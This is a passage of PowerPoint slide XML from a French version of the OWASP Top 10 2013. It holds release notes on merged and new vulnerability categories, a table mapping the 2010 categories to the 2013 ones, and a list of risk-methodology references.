                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="–"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Cette nouvelle catégorie a été créée en fusionnant 2010-A7 – Stockage cryptographique non sécurisé &amp; 2010-A9 – Protection insuffisante de la couche de transport, en y ajoutant le risque de données sensibles au niveau du navigateur. Cette nouvelle catégorie couvre la protection des données sensibles (autre que le contrôle d’accès déjà couvert par 2013-A4 et 2013-A7) à partir du moment où les données sensibles sont fournies par l’utilisateur, transmises et stockées dans l’application, et renvoyées ensuite au navigateur.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" indent="-228600" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicParenR" startAt="5"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Nous avons ajouté</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A9: Utilisation de composants avec des vulnérabilités connues</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="none" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="600" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="+"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Ce problème a été mentionné comme faisant partie de 2010-A6 – Mauvaise configuration de sécurité, mais mérite maintenant une catégorie à part entière du fait de la croissance rapide du développement à base de composants qui  a significativement augmenté le risque d’utilisation de composants connus comme vulnérables</a:t>
                      </a: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2261212958"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5715000"/>
          <a:ext cx="6858000" cy="3637709"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3733800"/>
                <a:gridCol w="3124200"/>
              </a:tblGrid>
              <a:tr h="351833">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2010 (Précédent)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2013 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(Nouveau)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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A1 – Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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A1 – Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A3 – Violation de Gestion d’authentification et de Session</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A2 – Violation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de Gestion d’authentification et de Session</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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A2 – Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="120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A3 – Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="120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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A4 – Références directes non sécurisées à un objet</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A4 – Références directes non sécurisées à un objet</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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no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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A6 – Mauvaise configuration sécurité</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A5 – Mauvaise configuration sécurité</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A7 –Stockage cryptographique non sécurisé –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> Fusionné avec A9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A6 – Exposition</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de données sensibles</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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chemeClr val="bg2">
                        <a:lumMod val="90000"/>
                      </a:schemeClr>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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A8 – Manque de restriction d’accès à une URL – Elargie dans </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A7 – Manque</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de contrôle d’accès au niveau fonctionnel</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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chemeClr val="bg2">
                        <a:lumMod val="90000"/>
                      </a:schemeClr>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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A5 – Falsification de requête intersites (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A8 – Falsification</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de requête intersites</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>&lt;inclus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> dans A6: Mauvaise configuration sécurité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A9 – Utilisation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de composants avec des vulnérabilités connues</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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chemeClr val="bg2">
                        <a:lumMod val="90000"/>
                      </a:schemeClr>
                    </a:solidFill>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t>A10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>– Redirection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> et Renvois non validés</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A10 –  Redirection et Renvois non validés</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="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r h="277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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A9 – Protection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> insuffisante de la couche transport</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="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kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Fusionné avec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t> 2010-A7 dans le nouveau </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A6</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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chemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Notes de version</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2466789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62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="76199"/>
            <a:ext cx="4876800" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Risques de sécurité applicatifs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 64"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1904920" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Risque</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3046896203"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4572000" y="4876800"/>
          <a:ext cx="2286000" cy="4267200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2286000"/>
              </a:tblGrid>
              <a:tr h="347708">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Références</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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39194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smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="800" b="1" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId4"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Méthodologie d’évaluation des risques OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Article sur la modélisation Menace / Risque</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Externe</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="800" b="1" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId4"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Analyse de s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t> risques de l’information FAIR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Modélisation des menaces</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Microsoft </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>(STRIDE et DREAD)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" u="sng" noProof="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1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 68"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4065637998"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4876800"/>
          <a:ext cx="4495800" cy="4267200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
